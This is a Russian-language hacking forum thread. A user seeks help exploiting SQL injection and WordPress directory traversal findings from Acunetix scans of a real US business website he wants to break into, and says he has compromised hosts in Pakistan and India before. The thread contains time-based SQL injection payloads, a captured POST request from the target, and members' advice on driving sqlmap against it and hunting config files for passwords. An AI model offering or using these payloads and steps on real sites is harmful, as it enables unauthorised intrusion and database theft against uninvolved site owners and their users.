acunetix + sqlmap и получение профита с дырок

[republique_centrafricaine]

Как можно при сканировании выбрать поиск конкретной дырки? Мне не очень нужны xss/css, зеленые/желтые/синие предупреждения. Надо сэкономить время и лучше пустить его на новые хосты.
Как я понимаю, можно реализовать только скули? Их концепция мне понятна. Что-то можно сделать с остальным?
Остается только долбить sqlmap и пытаться слить базу или можно как-то закрепить себя на хосте?

Пустые идут такого типа и их пачка (70)
"onmouseover=
<isindex type=image src=1 onerror

Тут нямка? Параметры
0'XOR(if(now()=sysdate(),sleep(6),0))XOR'Z

Tests performed:

• 0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z => 15.6
• 0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z => 15.394
• 0'XOR(if(now()=sysdate(),sleep(0),0))XOR'Z => 0.391
• 0'XOR(if(now()=sysdate(),sleep(3),0))XOR'Z => 3.395
• 0'XOR(if(now()=sysdate(),sleep(6),0))XOR'Z => 6.388
• 0'XOR(if(now()=sysdate(),sleep(0),0))XOR'Z => 0.385
• 0'XOR(if(now()=sysdate(),sleep(6),0))XOR'Z => 6.626

И URL encoded GET input wats was set to if(now()=sysdate(),sleep(6),0)
URL encoded POST input emailAddress was set to sample@email.tst' AND 3*2*1=6 AND '000Hr8T'='000Hr8T

URL encoded POST input lastName was set to (select(0)from(select(sleep(6)))v)/*'+(select(0)from(select(sleep(6)))v)+'"+(select(0)from(select(sleep(6)))v)+"*/
Path Fragment input /<s>/<s>/[*] was set to -1 OR 3*2*1=6 AND 000623=000623 --
Path Fragment input /<s>/<n>-[*]-<n> was set to -1' OR 3*2*1=6 AND 000274=000274 --
Path Fragment input /<s>/<n>-<n>-[*] was set to -1' OR 3*2*1=6 AND 000854=000854

Как-то так. Пока не понял, как отработать.

Сайт в юсе, старый биз, траф 80к/месяц, но пока сканил админ повесил на него тех обслуживание, так и не успел ничего сделать )
Через час поднял обратно, надо срочно бахнуть его )

Есть методы защиты от таких сканов? Капчи acunetix вроде бы обходит.
Тестил на этом же хосте нетспаркер и буст, вообще ничего не находит. Поделитесь опытом, что лучше брать для скана и эксплуатации? До этого вручную брал таргетные хосты и проводил nmap + vulners, потом вручную паблик экспами. Результат был в лучшем случае 1-2 хоста в неделю в пакистане и индии.

Desoxyn

 

[Raid]

Как можно при сканировании выбрать поиск конкретной дырки? Мне не очень нужны xss/css, зеленые/желтые/синие предупреждения.

При создании скана выбираешь не Full Scan а то на что хочешь сканить
Акунетиксом лучше всего отрабатывать много линков
Бурпом можно пройтись более точечно, например по каким-то страницам
Помимо sql ещё можно искать где можно загрузить файл в форму

 

[republique_centrafricaine]

При создании скана выбираешь не Full Scan а то на что хочешь сканить

Ну вот не выбрал бы фулл, не нашел бы WordPress Directory Traversal (3.7 - 5.0.3). Только еще не ясно, серьезная дырка или нет )

WordPress 5.0.0 Remote Code Execution

This blog post details how a combination of a Path Traversal and Local File Inclusion vulnerability lead to Remote Code Execution in the WordPress core (CVE-2019-8943). The vulnerability remained uncovered in the WordPress core for over 6 years.

blog.ripstech.com

Надо наверное найти такого же зеленого, как и я. Вместо мб проще будет )
Пишите в пм, кто хочет поломать бизы юсы )

UPD
Полезли криты. Знать бы еще как их отработать )

 

[Raid]

Ну вот не выбрал бы фулл, не нашел бы WordPress Directory Traversal (3.7 - 5.0.3). Только еще не ясно, серьезная дырка или нет )

WordPress 5.0.0 Remote Code Execution

This blog post details how a combination of a Path Traversal and Local File Inclusion vulnerability lead to Remote Code Execution in the WordPress core (CVE-2019-8943). The vulnerability remained uncovered in the WordPress core for over 6 years.

blog.ripstech.com

Надо наверное найти такого же зеленого, как и я. Вместо мб проще будет )

На сколько помню нет. Ну ты поищи
А что не так со скулей? Скинь что мапу даешь

 

[republique_centrafricaine]

На сколько помню нет. Ну ты поищи
А что не так со скулей? Скинь что мапу даешь

Обновил пост, полетели криты и скан еще идет.
Скулю еще не тестил, даже не в курсе, есть ли смысл )

 

[Desoxyn]

republique_centrafricaine​

Я акунетикс юзал последний раз году наверное в 12, тогда еще веб интерфейса или что у него там щас - не было. Он мне не нужен = не юзаю. В чем заключается конкретно вопрос твой ко мне? Нихера не понял, к чему скрины твои и кроме того, что ты хочешь сканить без xss. Так там есть профили для этого, и если не ошибаюсь, можно настроить свой.

 

[republique_centrafricaine]

Нихера не понял, к чему скрины твои и кроме того, что ты хочешь сканить без xss. Так там есть профили для этого, и если не ошибаюсь, можно настроить свой.

Да, все нашел, все перестроил.

Вопросы такого плана.
Ксс/хсс нужны только для атак на юзеров или можно как-то получить доступ к сайту?
Скули попробовал, позаливал в мапу, вроде бы что-то работает )
Можешь посмотреть скрин с вп дырами и отписать, что из этого можно взять в работу? Из твоего опыта.

 

[Desoxyn]

Это не конкретный вопрос, xss как класс уязвимостей достаточно освещены, стоит только набрать в поисковике. Как их применять - зависит от конечной цели, если ты ломаешь без цели а сам не зная зачем (типа для опыта), то сначала разберись в типе уязвимости, на котором собираешься тренироваться. А не тупо эксплуатировать "лиж бы было", ни опыта ни знаний тебе это не прибавит. По вп - ты вынуждаешь меня разбираться в твоих багах, искать PoC под обнаруженные твоим акунетиксом цвехи на вп. Я этого делать не буду, мы не партнеры и вообще я таким не занимаюсь, чтобы тратить на это время. Проэксплуатировать можно всё, что бажное. Но одно дело самому найти багу, хотя бы имея представление, что ты ищешь (или хотя бы конкретную цель), другое - скормить сканеру и спрашивать по форумам как это заюзать, самому не понимая зачем. Такие вопросы, плана "подскажите ткните а я нахуеверчу" я не поддерживаю, и помогать разбираться в этом не буду.

 

[republique_centrafricaine]

Это не конкретный вопрос, xss как класс уязвимостей достаточно освещены, стоит только набрать в поисковике. Как их применять - зависит от конечной цели, если ты ломаешь без цели а сам не зная зачем (типа для опыта), то сначала разберись в типе уязвимости, на котором собираешься тренироваться. А не тупо эксплуатировать "лиж бы было", ни опыта ни знаний тебе это не прибавит. По вп - ты вынуждаешь меня разбираться в твоих багах, искать PoC под обнаруженные твоим акунетиксом цвехи на вп. Я этого делать не буду, мы не партнеры и вообще я таким не занимаюсь, чтобы тратить на это время. Проэксплуатировать можно всё, что бажное. Но одно дело самому найти багу, хотя бы имея представление, что ты ищешь (или хотя бы конкретную цель), другое - скормить сканеру и спрашивать по форумам как это заюзать, самому не понимая зачем. Такие вопросы, плана "подскажите ткните а я нахуеверчу" я не поддерживаю, и помогать разбираться в этом не буду.

Ну да, все так.
Вот такое значение в окуне.

POST /includes/questionForm.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: https://www.сайт.com/
Cookie: PHPSESSID=48v3uc0ceeqti6gl20rbl4f8p7
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,br
Content-Length: 204
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4512.0 Safari/537.36
Host: www.сайт.com
Connection: Keep-alive

comments=e&email=e&email2=e&firstName=e&lastName=(select(0)from(select(sleep(6)))v)/*'%2B(select(0)from(select(sleep(6)))v)%2B'"%2B(select(0)from(select(sleep(6)))v)%2B"*/&optIn=0&phone=e&questionForm=330

Сую это же в req.txt и делаю sqlmap.py -r req.txt.

Ответ custom injection marker ('*') found in POST body. Do you want to process it?
Жму y
Идет 301 редирект на домен.
Жму y
Redirect is a result of a POST request. Do you want to resend original POST data to a new location?
Жму y
unable to connect
Если на второй пункте жму n идет тест

Жму y

В чем косяк?

При переходе на сайт.ком/includes/questionForm.php пустая страница
Если подставить ' криво отображается главная страница

Плагины еще не трогал, оставил на сладкое )
Но там в основном фокус на юзера, ксс и ксв.

 

[Desoxyn]

republique_centrafricaine​

Во первых, запускай мап с параметром -v 3, будешь видеть каждый шаг.
Во вторых, В строке comments=e&email=e&email2=e&firstName=e&lastName=(select(0)from(select(sleep(6)))v)/*'%2B(select(0)from(select(sleep(6)))v)%2B'"%2B(select(0)from(select(sleep(6)))v)%2B"*/&optIn=0&phone=e&questionForm=330 удали пэйлоад, который поставил акунетикс, т.е. строка должны быть comments=e&email=e&email2=e&firstName=e&lastName=*&optIn=0&phone=e&questionForm=330
В третьих, никто тебя за ручку вести не будет, какую кнопочку нажать.

 

[republique_centrafricaine]

republique_centrafricaine​

Во первых, запускай мап с параметром -v 3, будешь видеть каждый шаг.
Во вторых, В строке comments=e&email=e&email2=e&firstName=e&lastName=(select(0)from(select(sleep(6)))v)/*'%2B(select(0)from(select(sleep(6)))v)%2B'"%2B(select(0)from(select(sleep(6)))v)%2B"*/&optIn=0&phone=e&questionForm=330 удали пэйлоад, который поставил акунетикс, т.е. строка должны быть comments=e&email=e&email2=e&firstName=e&lastName=*&optIn=0&phone=e&questionForm=330
В третьих, никто тебя за ручку вести не будет, какую кнопочку нажать.

Сейчас буду тестировать на учебных объектах и копать маны )
Но я правильно понимаю, что ' должна либо вывести на ошибку, либо поломать страницу? И если sqlmap шлет пейлоады, то смогла найти дырку?

То есть строка из assoc=pHqghUme&comments=0'XOR(if(now()=sysdate()%2Csleep(6)%2C0))XOR'Z&county=1&email=1&email2=1&firstName=1&lastName=1&optIn=0&phone=1&questionForm=0
Должна быть?
assoc=&comments=*=1&email=1&email2=1&firstName=1&lastName=1&optIn=0&phone=1&questionForm=0

 

[Alexandr7]

Сейчас буду тестировать на учебных объектах и копать маны )
Но я правильно понимаю, что ' должна либо вывести на ошибку, либо поломать страницу? И если sqlmap шлет пейлоады, то смогла найти дырку?

Я так понимаю ты в адресную строку пихаешь. Там ошибки может и не быть. Фильтры срабатывают. Манов по скуле и софту валом в гууле и на форумах. И по сканерам также. В том числе и по sqlmap. Есть POST запросы GET/ WAFы на сайтах и прочее. Не поленись в гуулю заглянуть. Нужно не методом тыка работать, а знать хоть приблизительно что ты жмякаешь. И читать что пишет мап. Есть Netsparker еще. Он уже готовый запрос тебе даст для мапа. Зайди елементарно в гуугл

 

[republique_centrafricaine]

Netsparker

Да, клевая штука. Но у меня почему-то некоторые домены еррорит. 6.1 версия

 

[BuyKall]

Да, клевая штука. Но у меня почему-то некоторые домены еррорит. 6.1 версия
Посмотреть вложение 28178

Тут точно не про гадалок, тут не скажут тебе про то есть ли клауд или какой там WAF стоит.
Еррорит ну еррорит и что ?

Не стоит так же забывать что, как окунь так и нспакер может ошибиться просто....

 

[republique_centrafricaine]

Еррорит ну еррорит и что ?

Ничего. Окунь и бурп же пробивают как-то, а спакер не хочет )

 

[BuyKall]

Ничего. Окунь и бурп же пробивают как-то, а спакер не хочет )

ну вот ответь тогда.....кряк ? кряк-кряк
ну и не крякай

может кряк у тебя бракованный

 

[republique_centrafricaine]

ну вот ответь тогда.....кряк ? кряк-кряк
ну и не крякай

может кряк у тебя бракованный

Так некоторые же проходят xD
х#й знает, тесты показали, что окунь самый классный сканер.

 

[CheckerChin]

Знать бы еще как их отработать )

А чего тут думать? wpscan и пошел

 

[republique_centrafricaine]

А чего тут думать? wpscan и пошел

Такой же сканер. Тут у меня трабла в эксплуатуации, а не поиске )
Те, что на скрине не сильно опасны, базу не слить, к сайту доступ не получить.

Сейчас вот хочу бурпом пройтись, разобраться в скулях.

 

[CheckerChin]

Такой же сканер. Тут у меня трабла в эксплуатуации, а не поиске )
Те, что на скрие не сильно опасны, базу не слить, к сайту доступ не получить.

Ну я бы не сказал, что directory traversal не опасна. Можешь конфиги поискать, может пароли найдешь их можно попробовать